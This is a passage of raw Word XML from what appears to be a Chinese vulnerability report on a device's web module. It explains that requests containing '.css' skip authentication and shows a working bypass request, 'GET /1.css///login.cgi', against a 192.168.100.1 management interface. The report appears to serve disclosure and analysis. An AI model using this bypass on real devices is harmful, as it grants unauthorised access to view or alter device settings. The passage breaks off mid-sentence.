              <w:t>webParseRequestLine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E14DFA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>函数部分代码片段</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007E62CF" w:rsidRDefault="007E62CF" w:rsidP="00303753">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4991100" cy="196215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991100" cy="1962150"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="007E62CF" w:rsidRDefault="007E62CF" w:rsidP="007E62CF">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="007E62CF" w:rsidRPr="00DC57FC" w:rsidRDefault="007E62CF" w:rsidP="007E62CF">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E62CF">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5048250" cy="2295525"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="3" name="图片 2"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="375814" name="Picture 6"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId16" cstate="print"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5048250" cy="2295525"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00021104" w:rsidRPr="009A76B7" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6" w:themeFill="background1" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00021104" w:rsidRPr="009A76B7" w:rsidRDefault="00A4042C" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="宋体"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000FF"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>漏洞验证流程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A4042C" w:rsidRPr="009A76B7" w:rsidTr="00A4042C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w:rsidR="00A4042C" w:rsidRDefault="00FB6C3D" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="9452" w:dyaOrig="10977">
                <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:414.7pt;height:410.1pt" o:ole="">
                  <v:imagedata r:id="rId17" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1499847733" r:id="rId18"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A4042C" w:rsidRPr="009A76B7" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6" w:themeFill="background1" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00A4042C" w:rsidRDefault="00E14DFA" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>问题详细技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB65F6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>分析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00021104" w:rsidRPr="008F172C" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00021104" w:rsidRPr="005A1A2E" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>安全问题分析</w:t>
            </w:r>
            <w:r w:rsidRPr="005A1A2E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRDefault="00021104" w:rsidP="0039320A">
            <w:pPr>
              <w:pStyle w:val="af5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00370EE1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>正常情况下，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WEB 处理模块对一些前台资源不需要进行</w:t>
            </w:r>
            <w:r w:rsidR="0050538C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证及权限</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检查(譬如</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>css</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件,图片文件等);只对配置类以及查询类的资源进行</w:t>
            </w:r>
            <w:r w:rsidR="0050538C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证及</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限检查</w:t>
            </w:r>
            <w:r w:rsidRPr="00370EE1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">； </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRDefault="00021104" w:rsidP="0039320A">
            <w:pPr>
              <w:pStyle w:val="af5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>异常情况下,攻击者构造的</w:t>
            </w:r>
            <w:r w:rsidR="0050538C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请求</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中包含不需要进行</w:t>
            </w:r>
            <w:r w:rsidR="00202086">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证</w:t>
            </w:r>
            <w:r w:rsidR="00BE6851">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>及权限</w:t>
            </w:r>
            <w:r w:rsidR="00202086">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>校验</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的文件</w:t>
            </w:r>
            <w:r w:rsidR="0050538C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特征</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="0050538C" w:rsidRPr="00202086">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> 针对用户认证、权限校验的特例情况</w:t>
            </w:r>
            <w:r w:rsidR="00217C5C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="0050538C" w:rsidRPr="00202086">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进行关键字利用，提升权限，</w:t>
            </w:r>
            <w:r w:rsidR="0050538C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>直接查看或者修改设备的数据</w:t>
            </w:r>
            <w:r w:rsidR="0050538C" w:rsidRPr="00202086">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，其中一个可以攻击成功的</w:t>
            </w:r>
            <w:r w:rsidR="006D5184">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请求</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如下所示：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pP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 xml:space="preserve">GET </w:t>
            </w:r>
            <w:r w:rsidRPr="00021104">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00021104">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>1.css</w:t>
            </w:r>
            <w:r w:rsidRPr="00021104">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>///</w:t>
            </w:r>
            <w:r w:rsidR="00B858CD">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>login.cgi</w:t>
            </w:r>
            <w:r w:rsidRPr="00021104">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> HTTP/1.1</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Host: 192.168.100.1</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Proxy-Connection: keep-alive</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Content-Length: 2</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Accept: */*</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Origin: http://192.168.100.1</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 xml:space="preserve">X-Requested-With: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00021104">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>XMLHttpRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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lastRenderedPageBreak/>
              <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Windows NT 6.1) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00021104">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>AppleWebKit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00021104">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>/537.36 (KHML, like Gecko) Chrome/39.0.2171.95 Safari/537.36</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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00021104">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Referer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00021104">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>: http://192.168.100.1/index.asp</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 xml:space="preserve">Accept-Encoding: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00021104">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>gzip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00021104">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>, deflate</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRPr="00021104" w:rsidRDefault="00021104" w:rsidP="00303753">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hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00021104">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Accept-Language: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00021104">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>zh-CN,zh;q</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00021104">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>=0.8,en;q=0.6</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRPr="006A6731" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRPr="00E94A42" w:rsidRDefault="00C81FE5" w:rsidP="0039320A">
            <w:pPr>
              <w:pStyle w:val="af5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证</w:t>
            </w:r>
            <w:r w:rsidR="00021104">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检查时，上述的URL包含了</w:t>
            </w:r>
            <w:r w:rsidR="00021104" w:rsidRPr="00CF7286">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="0066FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00021104" w:rsidRPr="00CF7286">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
                <w:color w:val="0066FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>css</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00021104">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="0066FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>， 系统处理逻辑就认为是不需要</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="0066FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>认证</w:t>
            </w:r>
            <w:r w:rsidR="00021104">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="0066FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>的操作。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRPr="00370EE1" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="af5"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="780" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D63C4F" w:rsidRPr="00D63C4F" w:rsidRDefault="00021104" w:rsidP="0039320A">
            <w:pPr>
              <w:pStyle w:val="af5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WEB模块过滤掉“/”前</w:t>
            </w:r>
            <w:r w:rsidR="00202086">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>字符串， 找到了正常的</w:t>
            </w:r>
            <w:r w:rsidR="00B858CD">
              <w:rPr>
